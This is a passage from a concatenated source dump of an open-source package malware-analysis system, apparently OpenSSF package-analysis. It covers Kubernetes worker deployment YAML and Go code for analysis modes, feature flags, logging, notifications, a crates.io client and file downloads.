pubsub.googleapis.com|subscription|num_undelivered_messages 12 | selector: 13 | matchLabels: 14 | resource.labels.subscription_id: workers 15 | target: 16 | type: AverageValue 17 | averageValue: 1 18 | type: External 19 | scaleTargetRef: 20 | apiVersion: apps/v1 21 | kind: Deployment 22 | name: workers-deployment 23 | -------------------------------------------------------------------------------- /infra/worker/workers-set.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: workers-deployment 5 | labels: 6 | app: workers 7 | spec: 8 | replicas: 200 9 | selector: 10 | matchLabels: 11 | app: workers 12 | template: 13 | metadata: 14 | labels: 15 | app: workers 16 | spec: 17 | containers: 18 | - name: worker 19 | image: gcr.io/ossf-malware-analysis/analysis:latest 20 | imagePullPolicy: Always 21 | command: ["worker"] 22 | env: 23 | - name: OSSMALWARE_WORKER_SUBSCRIPTION 24 | # See: https://pkg.go.dev/gocloud.dev/pubsub/gcppubsub#URLOpener 25 | value: gcppubsub://projects/ossf-malware-analysis/subscriptions/workers?nacklazy=1 26 | - name: OSSF_MALWARE_ANALYSIS_RESULTS 27 | value: gs://ossf-malware-analysis-results 28 | - name: OSSF_MALWARE_ANALYSIS_EXECUTION_LOGS 29 | value: gs://ossf-malware-analysis-execution-logs 30 | - name: OSSF_MALWARE_ANALYSIS_FILE_WRITE_RESULTS 31 | value: gs://ossf-malware-analysis-file-write-results 32 | - name: OSSF_MALWARE_STATIC_ANALYSIS_RESULTS 33 | value: gs://ossf-malware-static-analysis-results-v1 34 | - name: OSSF_MALWARE_ANALYZED_PACKAGES 35 | value: gs://ossf-malware-analysis-analyzed-packages 36 | - name: LOGGER_ENV 37 | value: prod 38 | - name: OSSF_MALWARE_ANALYSIS_PACKAGES 39 | value: gs://ossf-malware-analysis-packages 40 | - name: OSSF_MALWARE_NOTIFICATION_TOPIC 41 | value: gcppubsub://projects/ossf-malware-analysis/topics/analysis-notify 42 | - name: OSSF_MALWARE_USER_AGENT_EXTRA 43 | value: "production" 44 | - name: 
OSSF_MALWARE_FEATURE_FLAGS 45 | value: "CodeExecution" 46 | securityContext: 47 | privileged: true 48 | volumeMounts: 49 | - mountPath: "/var/lib/containers" 50 | name: image-storage 51 | - mountPath: "/worker_tmp" 52 | name: worker-tmp 53 | resources: 54 | requests: 55 | cpu: 750m 56 | memory: 768Mi 57 | limits: 58 | cpu: 1 59 | memory: 2Gi 60 | volumes: 61 | - name: image-storage 62 | ephemeral: 63 | volumeClaimTemplate: 64 | metadata: 65 | labels: 66 | type: image-storage 67 | spec: 68 | accessModes: 69 | - ReadWriteOnce 70 | storageClassName: premium-rwo 71 | resources: 72 | requests: 73 | storage: 20Gi 74 | - name: worker-tmp 75 | ephemeral: 76 | volumeClaimTemplate: 77 | metadata: 78 | labels: 79 | type: worker-tmp 80 | spec: 81 | accessModes: 82 | - ReadWriteOnce 83 | storageClassName: premium-rwo 84 | resources: 85 | requests: 86 | storage: 5Gi 87 | strategy: 88 | type: "RollingUpdate" 89 | rollingUpdate: 90 | maxUnavailable: "5%" 91 | maxSurge: "1%" 92 | -------------------------------------------------------------------------------- /internal/analysis/mode.go: -------------------------------------------------------------------------------- 1 | package analysis 2 | 3 | // Mode (analysis mode) is used to distinguish between whether static or dynamic analysis is being performed. 
4 | type Mode string 5 | 6 | const ( 7 | Dynamic Mode = "dynamic" 8 | Static Mode = "static" 9 | ) 10 | 11 | func AllModes() []Mode { 12 | return []Mode{Dynamic, Static} 13 | } 14 | 15 | func ModeFromString(s string) (Mode, bool) { 16 | switch Mode(s) { 17 | case Dynamic: 18 | return Dynamic, true 19 | case Static: 20 | return Static, true 21 | default: 22 | return "", false 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /internal/analysis/status.go: -------------------------------------------------------------------------------- 1 | package analysis 2 | 3 | import ( 4 | "encoding/json" 5 | 6 | "github.com/ossf/package-analysis/internal/sandbox" 7 | ) 8 | 9 | type Status string 10 | 11 | const ( 12 | // StatusCompleted indicates that the analysis run completed successfully. 13 | StatusCompleted = Status("completed") 14 | 15 | // StatusErrorTimeout indicates that the analysis was aborted due to a 16 | // timeout. 17 | StatusErrorTimeout = Status("error_timeout") 18 | 19 | // StatusErrorAnalysis indicates that the package being analyzed failed 20 | // while running the specified command. 21 | // 22 | // The Stdout and Stderr in the Result should be consulted to understand 23 | // further why it failed. 24 | StatusErrorAnalysis = Status("error_analysis") 25 | 26 | // StatusErrorOther indicates an error during some part of the analysis 27 | // excluding errors covered by other statuses. 28 | StatusErrorOther = Status("error_other") 29 | ) 30 | 31 | // MarshalJSON implements the json.Marshaler interface. 
32 | func (s Status) MarshalJSON() ([]byte, error) { 33 | return json.Marshal(string(s)) 34 | } 35 | 36 | func StatusForRunResult(r *sandbox.RunResult) Status { 37 | switch r.Status() { 38 | case sandbox.RunStatusSuccess: 39 | return StatusCompleted 40 | case sandbox.RunStatusFailure: 41 | return StatusErrorAnalysis 42 | case sandbox.RunStatusTimeout: 43 | return StatusErrorTimeout 44 | default: 45 | return StatusErrorOther 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /internal/dynamicanalysis/sandbox_args.go: -------------------------------------------------------------------------------- 1 | package dynamicanalysis 2 | 3 | import ( 4 | "github.com/ossf/package-analysis/internal/pkgmanager" 5 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 6 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 7 | ) 8 | 9 | // defaultCommand returns the path (in the default sandbox image) 10 | // of the default dynamic analysis command for the ecosystem 11 | var defaultCommand = map[pkgecosystem.Ecosystem]string{ 12 | pkgecosystem.CratesIO: "/usr/local/bin/analyze-rust.py", 13 | pkgecosystem.NPM: "/usr/local/bin/analyze-node.js", 14 | pkgecosystem.Packagist: "/usr/local/bin/analyze-php.php", 15 | pkgecosystem.PyPI: "/usr/local/bin/analyze-python.py", 16 | pkgecosystem.RubyGems: "/usr/local/bin/analyze-ruby.rb", 17 | } 18 | 19 | func DefaultCommand(ecosystem pkgecosystem.Ecosystem) string { 20 | cmd := defaultCommand[ecosystem] 21 | if cmd == "" { 22 | panic("unsupported ecosystem: " + ecosystem) 23 | } 24 | return cmd 25 | } 26 | 27 | // MakeAnalysisArgs returns the arguments to pass to the dynamic analysis command in the sandbox 28 | // for the given phase of dynamic analysis on a package. 
The actual analysis command 29 | // depends on the ecosystem, see pkgmanager.PkgManager.DynamicAnalysisCommand() 30 | func MakeAnalysisArgs(p *pkgmanager.Pkg, phase analysisrun.DynamicPhase) []string { 31 | args := make([]string, 0) 32 | 33 | if p.IsLocal() { 34 | args = append(args, "--local", p.LocalPath()) 35 | } else if p.Version() != "" { 36 | args = append(args, "--version", p.Version()) 37 | } 38 | 39 | if phase == "" { 40 | args = append(args, "all") 41 | } else { 42 | args = append(args, string(phase)) 43 | } 44 | 45 | args = append(args, p.Name()) 46 | 47 | return args 48 | } 49 | -------------------------------------------------------------------------------- /internal/featureflags/featureflags.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "strings" 7 | ) 8 | 9 | var ErrUndefinedFlag = errors.New("undefined feature flag") 10 | 11 | var flagRegistry = make(map[string]*FeatureFlag) 12 | 13 | // FeatureFlag stores the state for a single flag. 14 | // 15 | // Call Enabled() to see if the flag is enabled. 16 | type FeatureFlag struct { 17 | isEnabled bool 18 | } 19 | 20 | // new registers the flag and sets the default enabled state. 21 | func new(name string, defaultEnabled bool) *FeatureFlag { 22 | ff := &FeatureFlag{ 23 | isEnabled: defaultEnabled, 24 | } 25 | flagRegistry[name] = ff 26 | return ff 27 | } 28 | 29 | // Enabled returns whether or not the feature is enabled. 30 | func (ff *FeatureFlag) Enabled() bool { 31 | return ff.isEnabled 32 | } 33 | 34 | // Update changes the internal state of the flags based on flags passed in. 35 | // 36 | // flags is a comma separated list of flag names. If a flag name is present it 37 | // will be enabled. If a flag name is preceeded with a "-" character it will be 38 | // disabled. 
39 | // 40 | // For example: "MyFeature,-ExperimentalFeature" will enable the flag "MyFeature" 41 | // and disable the flag "ExperimentalFeature". 42 | // 43 | // If a flag is undefined an error wrapping ErrUndefinedFlag will be returned. 44 | func Update(flags string) error { 45 | if flags == "" { 46 | return nil 47 | } 48 | for _, n := range strings.Split(flags, ",") { 49 | isEnabled := true 50 | if n[0] == '-' { 51 | isEnabled = false 52 | n = n[1:] 53 | } 54 | if ff, ok := flagRegistry[n]; ok { 55 | ff.isEnabled = isEnabled 56 | } else { 57 | return fmt.Errorf("%w %q", ErrUndefinedFlag, n) 58 | } 59 | } 60 | return nil 61 | } 62 | 63 | // State returns a representation of the flags that are enabled and disabled. 64 | func State() map[string]bool { 65 | s := make(map[string]bool) 66 | for k, v := range flagRegistry { 67 | s[k] = v.Enabled() 68 | } 69 | return s 70 | } 71 | -------------------------------------------------------------------------------- /internal/featureflags/featureflags_test.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | import ( 4 | "reflect" 5 | "testing" 6 | ) 7 | 8 | func resetRegistry() { 9 | flagRegistry = make(map[string]*FeatureFlag) 10 | } 11 | 12 | func TestFlagDefault_True(t *testing.T) { 13 | resetRegistry() 14 | ff := new("TestFlag", true) 15 | if !ff.Enabled() { 16 | t.Error("Enabled() = false; want true") 17 | } 18 | } 19 | 20 | func TestFlagDefault_False(t *testing.T) { 21 | resetRegistry() 22 | ff := new("TestFlag", false) 23 | if ff.Enabled() { 24 | t.Error("Enabled() = true; want false") 25 | } 26 | } 27 | 28 | func TestFlagUpdate_SingleFlag(t *testing.T) { 29 | resetRegistry() 30 | ff := new("TestFlag", false) 31 | Update("TestFlag") 32 | 33 | if !ff.Enabled() { 34 | t.Error("Enabled() = false; want true") 35 | } 36 | } 37 | 38 | func TestFlagUpdate_SingleFlagOff(t *testing.T) { 39 | resetRegistry() 40 | ff := new("TestFlag", true) 41 | 
Update("-TestFlag") 42 | 43 | if ff.Enabled() { 44 | t.Error("Enabled() = true; want false") 45 | } 46 | } 47 | 48 | func TestFlagUpdate_MultiFlags(t *testing.T) { 49 | resetRegistry() 50 | new("TestFlag1", false) 51 | new("TestFlag2", true) 52 | new("TestFlag3", false) 53 | Update("TestFlag1,-TestFlag2,TestFlag3") 54 | want := map[string]bool{ 55 | "TestFlag1": true, 56 | "TestFlag2": false, 57 | "TestFlag3": true, 58 | } 59 | if got := State(); !reflect.DeepEqual(want, got) { 60 | t.Errorf("State() = %v; want %v", got, want) 61 | } 62 | } 63 | 64 | func TestFlagUpdate_MultiFlags_EmptyString(t *testing.T) { 65 | resetRegistry() 66 | new("TestFlag1", false) 67 | new("TestFlag2", true) 68 | new("TestFlag3", false) 69 | Update("") 70 | want := map[string]bool{ 71 | "TestFlag1": false, 72 | "TestFlag2": true, 73 | "TestFlag3": false, 74 | } 75 | if got := State(); !reflect.DeepEqual(want, got) { 76 | t.Errorf("State() = %v; want %v", got, want) 77 | } 78 | } 79 | 80 | func TestFlagUpdate_Error(t *testing.T) { 81 | resetRegistry() 82 | err := Update("TestFlag") 83 | if err == nil { 84 | t.Errorf("Update() = nil; want an error") 85 | } 86 | } 87 | -------------------------------------------------------------------------------- /internal/featureflags/features.go: -------------------------------------------------------------------------------- 1 | package featureflags 2 | 3 | var ( 4 | // WriteFileContents will store the contents of write observed from strace 5 | // data during dynamic analysis. 6 | WriteFileContents = new("WriteFileContents", true) 7 | 8 | // SaveAnalyzedPackages downloads the package archive and saves it 9 | // to the analyzed packages bucket (if configured) after analysis completes 10 | SaveAnalyzedPackages = new("SaveAnalyzedPackages", true) 11 | 12 | // PubSubExtender determines whether the worker uses a real GCP extender 13 | // for keeping messages alive during long-running processing. 
14 | PubSubExtender = new("PubSubExtender", true) 15 | 16 | // CodeExecution invokes package code automatically during dynamic analysis, 17 | // which may uncover extra malicious behaviour. The names of executed functions, 18 | // methods and classes are logged to a file. 19 | CodeExecution = new("CodeExecution", true) 20 | 21 | // StraceDebugLogging enables verbose logging of strace parsing during dynamic analysis. 22 | // This feature can only be used in the analysis image, and if enabled, the -strace-logs-dir 23 | // flag must also be set. When enabled, the log files are then accessible via an explicit 24 | // docker mount or copy of the specified directory from the container to the host filesystem. 25 | StraceDebugLogging = new("StraceDebugLogging", false) 26 | ) 27 | -------------------------------------------------------------------------------- /internal/log/context.go: -------------------------------------------------------------------------------- 1 | package log 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type attrSliceContextKey struct{} 9 | 10 | func attrSliceFromContext(ctx context.Context) []slog.Attr { 11 | if v := ctx.Value(attrSliceContextKey{}); v != nil { 12 | return v.([]slog.Attr) 13 | } 14 | return nil 15 | } 16 | 17 | // ContextWithAttrs is used to add attrs to the context so they are included 18 | // when logs are output. 19 | func ContextWithAttrs(ctx context.Context, attr ...slog.Attr) context.Context { 20 | if len(attr) == 0 { 21 | return ctx 22 | } 23 | attrSlice := append(attrSliceFromContext(ctx), attr...) 24 | return context.WithValue(ctx, attrSliceContextKey{}, attrSlice) 25 | } 26 | 27 | func ClearContextAttrs(ctx context.Context) context.Context { 28 | attrSlice := attrSliceFromContext(ctx) 29 | if attrSlice == nil { 30 | return ctx 31 | } 32 | return context.WithValue(ctx, attrSliceContextKey{}, nil) 33 | } 34 | 35 | // LoggerWithContext returns a logger with any attrs in the context passed to 36 | // the logger. 
37 | // 38 | // Note: duplicate attributes may be logged if ctx, or a descendent, is used 39 | // later in a call to (Debug|Info|Warn|Error)Context on the returned slog.Logger. 40 | // 41 | // If the same context is needed, call ClearContextAttrs on the context to avoid 42 | // logging the attrs again. 43 | func LoggerWithContext(logger *slog.Logger, ctx context.Context) *slog.Logger { 44 | attrSlice := attrSliceFromContext(ctx) 45 | if len(attrSlice) == 0 { 46 | return logger 47 | } 48 | return slog.New(logger.Handler().WithAttrs(attrSlice)) 49 | } 50 | 51 | type contextLogHandler struct { 52 | handler slog.Handler 53 | } 54 | 55 | func (h *contextLogHandler) Handle(ctx context.Context, r slog.Record) error { 56 | attrSlice := attrSliceFromContext(ctx) 57 | if len(attrSlice) > 0 { 58 | r.AddAttrs(attrSlice...) 59 | } 60 | return h.handler.Handle(ctx, r) 61 | } 62 | 63 | func (h *contextLogHandler) WithAttrs(attrs []slog.Attr) slog.Handler { 64 | return &contextLogHandler{ 65 | handler: h.handler.WithAttrs(attrs), 66 | } 67 | } 68 | 69 | func (h *contextLogHandler) WithGroup(name string) slog.Handler { 70 | return &contextLogHandler{ 71 | handler: h.handler.WithGroup(name), 72 | } 73 | } 74 | 75 | func (h *contextLogHandler) Enabled(ctx context.Context, l slog.Level) bool { 76 | return h.handler.Enabled(ctx, l) 77 | } 78 | 79 | func NewContextLogHandler(handler slog.Handler) slog.Handler { 80 | return &contextLogHandler{ 81 | handler: handler, 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /internal/log/context_test.go: -------------------------------------------------------------------------------- 1 | package log_test 2 | 3 | import ( 4 | "context" 5 | "testing" 6 | 7 | "log/slog" 8 | 9 | "github.com/ossf/package-analysis/internal/log" 10 | ) 11 | 12 | func assertRecordAttrs(t *testing.T, r slog.Record, attrs []slog.Attr) { 13 | t.Helper() 14 | 15 | wantLen := len(attrs) 16 | gotLen := r.NumAttrs() 17 | if 
wantLen != gotLen { 18 | t.Errorf("record.NumAttrs() = %v; want %v", gotLen, wantLen) 19 | } 20 | 21 | r.Attrs(func(a slog.Attr) bool { 22 | for _, attr := range attrs { 23 | if a.Equal(attr) { 24 | return true 25 | } 26 | } 27 | t.Errorf("unexpected attr %v", a) 28 | return true 29 | }) 30 | } 31 | 32 | func TestContextWithAttrs(t *testing.T) { 33 | attr1 := slog.Any("hello", "world") 34 | attr2 := slog.Int("meaning", 42) 35 | attr3 := slog.String("a", "b") 36 | 37 | h := &testHandler{} 38 | logger := slog.New(log.NewContextLogHandler(h)) 39 | 40 | ctx := context.Background() 41 | 42 | // Add attrs to the context and ensure they are used. 43 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 44 | logger.InfoContext(ctx, "test", "a", "b") 45 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 46 | } 47 | 48 | func TestContextWithAttrs_InnerCtx(t *testing.T) { 49 | attr1 := slog.Any("hello", "world") 50 | attr2 := slog.Int("meaning", 42) 51 | attr3 := slog.Any("complex", struct{ a string }{a: "string"}) 52 | 53 | h := &testHandler{} 54 | logger := slog.New(log.NewContextLogHandler(h)) 55 | 56 | ctx := context.Background() 57 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 58 | 59 | // Add more attrs to the context and ensure they are used. 60 | innerCtx := log.ContextWithAttrs(ctx, attr3) 61 | logger.InfoContext(innerCtx, "test") 62 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 63 | } 64 | 65 | func TestContextWithAttrs_OuterAfterInnerCtx(t *testing.T) { 66 | attr1 := slog.Any("hello", "world") 67 | attr2 := slog.Int("meaning", 42) 68 | attr3 := slog.Any("complex", struct{ a string }{a: "string"}) 69 | 70 | h := &testHandler{} 71 | logger := slog.New(log.NewContextLogHandler(h)) 72 | 73 | ctx := context.Background() 74 | ctx = log.ContextWithAttrs(ctx, attr1, attr2) 75 | _ = log.ContextWithAttrs(ctx, attr3) 76 | 77 | // Use the earlier context to ensure the innerCtx attrs are not included. 
78 | logger.InfoContext(ctx, "test") 79 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2}) 80 | } 81 | 82 | func TestContextWithAttrs_NoAttrs(t *testing.T) { 83 | attr1 := slog.String("a", "b") 84 | 85 | h := &testHandler{} 86 | logger := slog.New(log.NewContextLogHandler(h)) 87 | 88 | ctx := context.Background() 89 | ctx = log.ContextWithAttrs(ctx) 90 | 91 | logger.InfoContext(ctx, "test", "a", "b") 92 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1}) 93 | } 94 | 95 | func TestLoggerWithContext(t *testing.T) { 96 | attr1 := slog.Any("hello", "world") 97 | attr2 := slog.Int("meaning", 42) 98 | attr3 := slog.String("a", "b") 99 | 100 | h := &testHandler{} 101 | logger := slog.New(log.NewContextLogHandler(h)) 102 | 103 | ctx := context.Background() 104 | ctx = log.ContextWithAttrs(ctx, attr1) 105 | logger = log.LoggerWithContext(logger, ctx) 106 | 107 | ctx = log.ContextWithAttrs(log.ClearContextAttrs(ctx), attr2) 108 | 109 | logger.InfoContext(ctx, "test", "a", "b") 110 | assertRecordAttrs(t, h.LastRecord(), []slog.Attr{attr1, attr2, attr3}) 111 | } 112 | -------------------------------------------------------------------------------- /internal/log/log.go: -------------------------------------------------------------------------------- 1 | // Package log wraps Uber's Zap logging library to make it easy to use across 2 | // the project. 3 | // 4 | // Initialize() MUST be called before the first logging statement, if it is not 5 | // called the command will panic and exit. 6 | // 7 | // See the Zap docs for more details: https://pkg.go.dev/go.uber.org/zap 8 | package log 9 | 10 | import ( 11 | golog "log" 12 | "log/slog" 13 | "strings" 14 | 15 | "github.com/blendle/zapdriver" 16 | "go.uber.org/zap" 17 | "go.uber.org/zap/exp/zapslog" 18 | ) 19 | 20 | // LoggingEnv is used to represent a specific configuration used by a given 21 | // environment. 22 | type LoggingEnv string 23 | 24 | // String implements the Stringer interface. 
25 | func (e LoggingEnv) String() string { 26 | return string(e) 27 | } 28 | 29 | const ( 30 | LoggingEnvDev LoggingEnv = "dev" 31 | LoggingEnvProd LoggingEnv = "prod" 32 | 33 | // StraceDebugLogDir is a hardcoded directory that can be used to store 34 | // the strace debug log, if the strace debug logging feature is enabled 35 | StraceDebugLogDir = "/straceLogs" 36 | ) 37 | 38 | var ( 39 | defaultLoggingEnv LoggingEnv = LoggingEnvDev 40 | ) 41 | 42 | func DefaultLoggingEnv() LoggingEnv { 43 | return defaultLoggingEnv 44 | } 45 | 46 | // Initialize the logger for logging. 47 | // 48 | // Passing in "true" will use Zap's default production configuration, while 49 | // "false" will use the default development configuration. 50 | // 51 | // Note: this method MUST be called before any other method in this package. 52 | func Initialize(env string) { 53 | // TODO: replace zap entirely with native slog. 54 | // Note that zap currently provides some useful features, such as prod and 55 | // dev environments, standard logger replacement, and GCP StackDriver 56 | // integration. Since log/slog is so new, many of the same capabilities are 57 | // yet to receive good support in third-party libraries. 58 | var err error 59 | var logger *zap.Logger 60 | switch strings.ToLower(env) { 61 | case LoggingEnvProd.String(): 62 | defaultLoggingEnv = LoggingEnvProd 63 | config := zapdriver.NewProductionConfig() 64 | // Make sure sampling is disabled. 65 | config.Sampling = nil 66 | // Build the logger and ensure we use the zapdriver Core so that labels 67 | // are handled correctly. 68 | logger, err = config.Build(zapdriver.WrapCore()) 69 | case LoggingEnvDev.String(): 70 | fallthrough 71 | default: 72 | logger, err = zap.NewDevelopment() 73 | } 74 | if err != nil { 75 | golog.Panic(err) 76 | } 77 | zap.RedirectStdLog(logger) 78 | // Ensure slog.Default logs to the same destination as zap. 
79 | slogger := slog.New(NewContextLogHandler(zapslog.NewHandler(logger.Core(), zapslog.WithCaller(true)))) 80 | slog.SetDefault(slogger) 81 | } 82 | 83 | // Label causes attributes written by zapdriver to be marked as labels inside 84 | // StackDriver when LoggingEnv is LoggingEnvProd. Otherwise it wraps slog.String. 85 | func Label(key, value string) slog.Attr { 86 | if defaultLoggingEnv == LoggingEnvProd { 87 | return slog.String("labels."+key, value) 88 | } else { 89 | return slog.String(key, value) 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /internal/log/log_test.go: -------------------------------------------------------------------------------- 1 | package log_test 2 | 3 | import ( 4 | "context" 5 | "log/slog" 6 | ) 7 | 8 | type testHandler struct { 9 | slog.Handler 10 | 11 | root *testHandler 12 | records []slog.Record 13 | attrs []slog.Attr 14 | } 15 | 16 | func (h *testHandler) getRoot() *testHandler { 17 | if h.root == nil { 18 | return h 19 | } 20 | return h.root 21 | } 22 | 23 | func (h *testHandler) LastRecord() slog.Record { 24 | root := h.getRoot() 25 | l := len(root.records) 26 | if l == 0 { 27 | return slog.Record{} 28 | } 29 | return root.records[l-1] 30 | } 31 | 32 | func (h *testHandler) All() []slog.Record { 33 | root := h.getRoot() 34 | return root.records 35 | } 36 | 37 | func (h *testHandler) Len() int { 38 | root := h.getRoot() 39 | return len(root.records) 40 | } 41 | 42 | func (h *testHandler) Enabled(_ context.Context, _ slog.Level) bool { 43 | return true 44 | } 45 | 46 | func (h *testHandler) Handle(ctx context.Context, r slog.Record) error { 47 | r.AddAttrs(h.attrs...) 
48 | root := h.getRoot() 49 | root.records = append(h.getRoot().records, r) 50 | return nil 51 | } 52 | 53 | func (h *testHandler) WithAttrs(attrs []slog.Attr) slog.Handler { 54 | return &testHandler{ 55 | root: h.getRoot(), 56 | attrs: append(h.attrs, attrs...), 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /internal/log/writer.go: -------------------------------------------------------------------------------- 1 | package log 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "io" 7 | "log/slog" 8 | "unicode" 9 | ) 10 | 11 | // NewWriter returns an io.WriteCloser that logs each line written as a single 12 | // log entry at the given level with the supplied keysAndValues. 13 | // 14 | // Close() must be called to free up the resources used and flush any unwritten 15 | // log entries to the logger. 16 | func NewWriter(ctx context.Context, logger *slog.Logger, level slog.Level) io.WriteCloser { 17 | return &writer{ 18 | ctx: ctx, 19 | logger: logger, 20 | level: level, 21 | } 22 | } 23 | 24 | type writer struct { 25 | ctx context.Context 26 | logger *slog.Logger 27 | level slog.Level 28 | buffer bytes.Buffer 29 | } 30 | 31 | // Write implements the io.Writer interface. 32 | // 33 | // Each line of bytes written appears as a log entry. 34 | func (w *writer) Write(p []byte) (int, error) { 35 | written := 0 36 | for { 37 | if len(p) == 0 { 38 | // p is now empty, so exit with the bytes written 39 | return written, nil 40 | } 41 | i := bytes.IndexByte(p, '\n') 42 | if i == -1 { 43 | // No more newlines to consume, so save the buffer and return 44 | n, err := w.buffer.Write(p) 45 | return written + n, err 46 | } 47 | // Append to the buffer. 
48 | n, err := w.buffer.Write(p[:i]) 49 | written += n 50 | if err != nil { 51 | return written, err 52 | } 53 | // Update the input and consume the newline 54 | p = p[i+1:] 55 | written += 1 56 | // Dump the buffer to the log 57 | line := w.buffer.Bytes() 58 | // Trim any trailing space - this won't include the newline 59 | line = bytes.TrimRightFunc(line, unicode.IsSpace) 60 | // Swallow any empty lines 61 | if len(line) > 0 { 62 | w.logger.Log(w.ctx, w.level, string(line)) 63 | } 64 | // Reset the buffer. 65 | w.buffer.Reset() 66 | } 67 | } 68 | 69 | // Close implements the io.Closer interface. 70 | // 71 | // Any unwritten bytes written as a final log entry. 72 | func (w *writer) Close() error { 73 | if w.buffer.Len() > 0 { 74 | w.logger.Log(w.ctx, w.level, w.buffer.String()) 75 | w.buffer.Reset() 76 | } 77 | return nil 78 | } 79 | -------------------------------------------------------------------------------- /internal/notification/notification.go: -------------------------------------------------------------------------------- 1 | package notification 2 | 3 | import ( 4 | "context" 5 | "encoding/json" 6 | "fmt" 7 | 8 | "gocloud.dev/pubsub" 9 | 10 | "github.com/ossf/package-analysis/pkg/api/analysisrun" 11 | "github.com/ossf/package-analysis/pkg/api/notification" 12 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 13 | ) 14 | 15 | func PublishAnalysisCompletion(ctx context.Context, notificationTopic *pubsub.Topic, name, version string, ecosystem pkgecosystem.Ecosystem) error { 16 | k := analysisrun.Key{Name: name, Version: version, Ecosystem: ecosystem} 17 | notificationMsg, err := json.Marshal(notification.AnalysisRunComplete{Key: k}) 18 | if err != nil { 19 | return fmt.Errorf("failed to encode completion notification: %w", err) 20 | } 21 | err = notificationTopic.Send(ctx, &pubsub.Message{ 22 | Body: notificationMsg, 23 | Metadata: nil, 24 | }) 25 | if err != nil { 26 | return fmt.Errorf("failed to send completion notification: %w", err) 27 | } 28 
| return nil 29 | } 30 | -------------------------------------------------------------------------------- /internal/pkgmanager/crates.io.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "encoding/json" 5 | "fmt" 6 | "net/http" 7 | "strings" 8 | 9 | "github.com/ossf/package-analysis/pkg/api/pkgecosystem" 10 | ) 11 | 12 | type cratesJSON struct { 13 | Versions []struct { 14 | Num string `json:"num"` 15 | } `json:"versions"` 16 | } 17 | 18 | func getCratesLatest(pkg string) (string, error) { 19 | resp, err := http.Get(fmt.Sprintf("https://crates.io/api/v1/crates/%s/versions", pkg)) 20 | if err != nil { 21 | return "", err 22 | } 23 | defer resp.Body.Close() 24 | 25 | decoder := json.NewDecoder(resp.Body) 26 | var details cratesJSON 27 | err = decoder.Decode(&details) 28 | if err != nil { 29 | return "", err 30 | } 31 | 32 | return details.Versions[0].Num, nil 33 | } 34 | 35 | func getCratesArchiveURL(pkgName, version string) (string, error) { 36 | pkgURL := fmt.Sprintf("https://crates.io/api/v1/crates/%s/%s/download", pkgName, version) 37 | resp, err := http.Get(pkgURL) 38 | if err != nil { 39 | return "", err 40 | } 41 | defer resp.Body.Close() 42 | 43 | return pkgURL, nil 44 | } 45 | 46 | func getCratesArchiveFilename(pkgName, version, _ string) string { 47 | return strings.Join([]string{pkgName, "-", version, ".tar.gz"}, "") 48 | } 49 | 50 | var cratesPkgManager = PkgManager{ 51 | ecosystem: pkgecosystem.CratesIO, 52 | latestVersion: getCratesLatest, 53 | archiveURL: getCratesArchiveURL, 54 | archiveFilename: getCratesArchiveFilename, 55 | } 56 | -------------------------------------------------------------------------------- /internal/pkgmanager/download.go: -------------------------------------------------------------------------------- 1 | package pkgmanager 2 | 3 | import ( 4 | "fmt" 5 | "io" 6 | "net/http" 7 | "os" 8 | ) 9 | 10 | /* 11 | downloadToPath creates (and/or truncates) a 
file at the given path, then writes 12 | contents of whatever is at the given URL to that given file using downloadToFile, 13 | and finally closes the file. 14 | 15 | If any error occurs, the created file is removed. 16 | 17 | Callers must ensure that path and url are nonempty, otherwise the function will panic. 18 | */ 19 | func downloadToPath(path, url string) error { 20 | if path == "" { 21 | panic("path is empty") 22 | } 23 | if url == "" { 24 | panic("url is empty") 25 | } 26 | 27 | file, err := os.Create(path) 28 | if err != nil { 29 | return err 30 | } 31 | 32 | if downloadErr := downloadToFile(file, url); downloadErr != nil { 33 | // cleanup file 34 | if removeErr := os.Remove(path); removeErr != nil { 35 | return fmt.Errorf("%w\n%v", downloadErr, removeErr) 36 | } 37 | return downloadErr 38 | } 39 | 40 | if closeErr := file.Close(); closeErr != nil { 41 | // cleanup file 42 | if removeErr := os.Remove(path); removeErr != nil { 43 | return fmt.Errorf("%w\n%v", closeErr, removeErr) 44 | } 45 | return closeErr 46 | } 47 | 48 | return nil 49 | } 50 | 51 | /* 52 | downloadToFile writes the contents of whatever is at the given URL to the 53 | given file, without opening or closing the file. If any errors occur while 54 | making the network request, then no file operations will be performed. 55 | 56 | Callers must ensure that url is nonempty, otherwise the function will panic. 
